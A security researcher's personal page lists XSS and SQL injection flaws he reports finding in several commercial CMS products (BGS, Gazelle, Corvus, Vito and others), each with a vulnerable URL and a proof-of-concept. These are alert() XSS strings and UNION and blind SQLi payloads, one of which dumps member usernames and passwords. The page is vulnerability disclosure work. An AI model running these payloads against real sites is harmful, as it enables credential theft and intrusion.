Predrag Cujanović


List of security vulnerabilities I have discovered

SQLi, XSS, ...

The list currently contains XSS and SQLi security vulnerabilities in commercial web applications.

 

BGS CMS XSS:

Software: BGS CMS

Website: www.bgs-cms.com

Vulnerable URL: https://www.server/?action=search&search=[XSS]

PoC (Proof of Concept):
https://www.server/?action=search&search=<script>alert(String.fromCharCode(88,+83,+83));</script>

 

 

Anantasoft Gazelle CMS XSS:

Software: Anantasoft Gazelle CMS

Website: https://www.anantasoft.com

Vulnerable URL: https://www.server/search.php?lookup=[XSS]

PoC (Proof of Concept):
https://www.server/search.php?lookup=<script>alert(String.fromCharCode(88, 83, 83));</script>

 

 

Corvus CMS XSS:

Software: Corvus CMS

Website: https://www.corvuscms.hr/cms-rjesenja-24.aspx

Vulnerable URL: https://server/Content/Search.aspx?q=[XSS]

PoC (Proof of Concept):
https://www.server/Content/Search.aspx?q=<script>alert(String.fromCharCode(88, 83, 83));</script>

 

 

Spectrum Software WebManager CMS XSS:

Software: Spectrum Software WebManager CMS XSS

Website: https://www.spectrum.hr/proizvodi/web_manager_-_cms/default.aspx

Vulnerable URL: https://www.server/Search_1.aspx?pojam=[XSS]

PoC (Proof of Concept):
https://www.server/Search_1.aspx?pojam=<script>alert(String.fromCharCode(88,83, 83));</script>

 

 

Vito CMS SQL Injection:

Software: Vito CMS SQL Injection

Website: https://kameleon-lab.com/vito-cms.php

Vulnerable URL: https://server/duga_vest.php?id=1[SQLi]

PoC (Proof of Concept):
https://server/duga_vest.php?id=-217+UNION+SELECT+1,2,3,group_concat(id,0x3a,username,0x3a,password,0x3a),5,6,7,8+from+members--

 

 

LINK CMS SQL Injection:

Software: LINK CMS SQL Injection

Website: https://www.link-softsolutions.com/SoftLink-Content-Management-System—CMS_20_1

Vulnerable URL: https://server/navigacija.php?jezik=lat&IDMeniGlavni=6&IDMeniPodSekcija=45&IDMeniPodSekcija3=6&IDStranicaPodaci=63[SQLi]

PoC (Proof of Concept):
https://server/navigacija.php?jezik=lat&IDMeniGlavni=6&IDMeniPodSekcija=45&IDMeniPodSekcija3=6&IDStranicaPodaci=-63+UNION+SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--

 

 

Clicker CMS Blind SQL Injection:

Software: Clicker CMS Blind SQL Injection

Website: n/a

Vulnerable URL: https://server/index.php?lang=4[BSQLi]

PoC (Proof of Concept):
https://server/index.php?lang=4 and substring(@@version,1,1)=5-- (true or false)

https://server/index.php?lang=4 and substring(@@version,1,1)=4-- (false or true)

Some of these were published on sites that collect and verify discovered security vulnerabilities: exploit-db.com, packetstormsecurity.org and secunia.com.

Today most of this software has been “patched”.
